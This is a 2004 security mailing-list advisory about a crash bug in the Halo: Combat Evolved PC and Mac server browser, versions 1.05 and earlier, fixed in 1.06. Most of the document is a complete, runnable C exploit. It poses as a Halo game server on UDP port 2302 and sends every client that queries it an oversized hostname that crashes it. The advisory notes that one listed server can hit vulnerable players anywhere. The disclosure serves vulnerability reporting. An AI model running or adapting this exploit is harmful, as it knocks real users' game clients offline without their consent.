[NEWS] Halo Broadcast Client Crash
From: SecuriTeam (support_at_securiteam.com)
Date: 11/23/04
- Previous message: SecuriTeam: "[UNIX] PHPKit SQL Injection and XSS Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 23 Nov 2004 18:15:44 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Halo Broadcast Client Crash
------------------------------------------------------------------------
SUMMARY
"Armed with a brand new arsenal of weapons and vehicles,
<http://www.microsoft.com/games/pc/halo.aspx> Halo delivers challenges and
surprises, as well as intense online multiplayer competition exclusively
for the PC, including new multiplayer maps."
Certain long server replies aren't properly bounds checked and may cause
the Halo client to crash upon parsing them.
DETAILS
Vulnerable Systems:
* Halo: Combat Evolved for the PC and Mac, versions 1.05 and prior
Immune Systems:
* Halo: Combat Evolved version 1.06
The problem affects the in-game browser of the clients used to navigate
through the list of online servers and is caused by some overrun
protections. If these instructions find a value too long in a server's
reply they pass a NULL pointer (instead of the original value) to a
wcsncpy() function causing the crash.
Note: This is a broadcast client crash, so a single attacker visible in
the master server list can passively exploit any vulnerable client in the
world.
A proof of concept can be downloaded from
<http://aluigi.altervista.org/poc/halocboom.zip>
http://aluigi.altervista.org/poc/halocboom.zip and the main file is pasted
here for conveniece.
Proof Of Concept
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define PING "\x05\x00\x00\x00\x00\x00"
#define PORT 2302
#define GAMEVER "GAMEVER__HERE"
#define BOOM
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
char *versions[][2] = {
{ "1.05", "01.00.05.0610" },
{ "1.04", "01.00.04.0607" },
{ "1.031", "01.00.03.0606" },
{ "1.03", "01.00.03.0605" },
{ "1.02", "01.00.02.0581" },
{ "1.01", "01.00.01.0580" },
{ "1.00", "01.00.00.0564" },
{ "ce", "01.00.00.0609" },
{ NULL, NULL }
};
void std_err(void);
int main(int argc, char *argv[]) {
int sd,
len,
on = 1,
i,
iver,
psz;
struct sockaddr_in peer;
u_char buff[BUFFSZ + 1],
*pck,
pcklan[] =
"\x00\x00\x00\x00\x00"
"hostname\0" BOOM "\0" /* not only here */
"gamever\0" GAMEVER "\0"
"hostport\0" "\0"
"maxplayers\0" "16\0"
"password\0" "0\0"
"mapname\0" "longest\0"
"dedicated\0" "1\0"
"gamemode\0" "openplaying\0"
"game_classic\0" "0\0"
"numplayers\0" "0\0"
"gametype\0" "CTF\0"
"teamplay\0" "1\0"
"gamevariant\0" "\0"
"fraglimit\0" "3\0"
"player_flags\0" "1943015556,2\0"
"game_flags\0" "65\0"
"\0" "\0",
pckinternet[] =
"\x00\x00\x00\x00\x00"
BOOM "\0"
GAMEVER "\0"
"0\0"
"CTF\0"
"openplaying\0"
"0\0"
"16\0";
setbuf(stdout, NULL);
fputs("\n"
"Halo <= 1.05 broadcast client crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <version>\n"
"\n"
" You must decide what version of the clients you want to
crash:\n"
"\n", argv[0]);
for(i = 0; *versions[i]; i++) {
printf(" %s\t%s\n", versions[i][0], versions[i][1]);
}
fputc('\n', stdout);
exit(1);
}
for(iver = 0; versions[iver][0]; iver++) {
if(!strcmp(argv[1], versions[iver][0])) break;
}
if(!versions[iver][0]) {
printf("\nError: you must choose between the versions listed at
the beginning\n");
exit(1);
}
printf("- version: %s \t%s\n", versions[iver][0],
versions[iver][1]);
for(i = 0; i < (sizeof(pcklan) - 14); i++) {
if(!memcmp(pcklan + i, GAMEVER, 13)) {
memcpy(pcklan + i, versions[iver][1], 13);
break;
}
}
for(i = 0; i < (sizeof(pckinternet) - 14); i++) {
if(!memcmp(pckinternet + i, GAMEVER, 13)) {
memcpy(pckinternet + i, versions[iver][1], 13);
break;
}
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
peer.sin_addr.s_addr = INADDR_ANY;
peer.sin_port = htons(PORT);
peer.sin_family = AF_INET;
psz = sizeof(peer);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
printf("- bind UDP port %d\n", PORT);
if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
< 0) std_err();
if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
fputs("\nClients:\n", stdout);
while(1) {
len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer,
&psz);
if(len < 0) std_err();
if(buff[2]) {
printf("PING %s:%hu\n",
inet_ntoa(peer.sin_addr), htons(peer.sin_port));
if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr
*)&peer, sizeof(peer))
< 0) std_err();
continue;
}
if(len == 10) {
fputs("LAN ", stdout);
pck = pcklan;
len = sizeof(pcklan) - 1;
} else {
fputs("INTERNET ", stdout);
pck = pckinternet;
len = sizeof(pckinternet) - 1;
}
printf("%s:%hu\n",
inet_ntoa(peer.sin_addr), htons(peer.sin_port));
memcpy(pck, buff + 2, 5);
if(sendto(sd, pck, len, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
}
close(sd);
return(0);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@autistici.org> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/halocboom-adv.txt>
http://aluigi.altervista.org/adv/halocboom-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] PHPKit SQL Injection and XSS Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [NT] Horde Multiple XSS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... based on PHP and the Horde
Framework." ... Horde is subject to a client side script injection vulnerability
in the ... (Securiteam) - [UNIX] EMC Dantz Retrospect Backup DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... EMC Dantz Retrospect Backup
DoS ... EMC Dantz Retrospect is a network backup client ... (Securiteam) - [NT] SafeNet SoftRemote VPN Client Clear-text Password in Memory
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... SoftRemote VPN client:
The SoftRemote client stores the password in an ... The SafeNet SoftRemote VPN client is
widely used for remote access IPsec ... system to obtain a physical memory dump. ...
(Securiteam) - [NEWS] Multiple Vulnerabilities In NAS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The server daemon runs
as root and listens ... int newconn; ... Can't read slave name length from USL
client ... (Securiteam) - [NT] Citrix Neighborhood Agent Buffer Overflow and Arbitrary Shortcut Creation
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Server Client and facilitates
access to Citrix published applications. ... an attacker must determine the length of the
... (Securiteam)
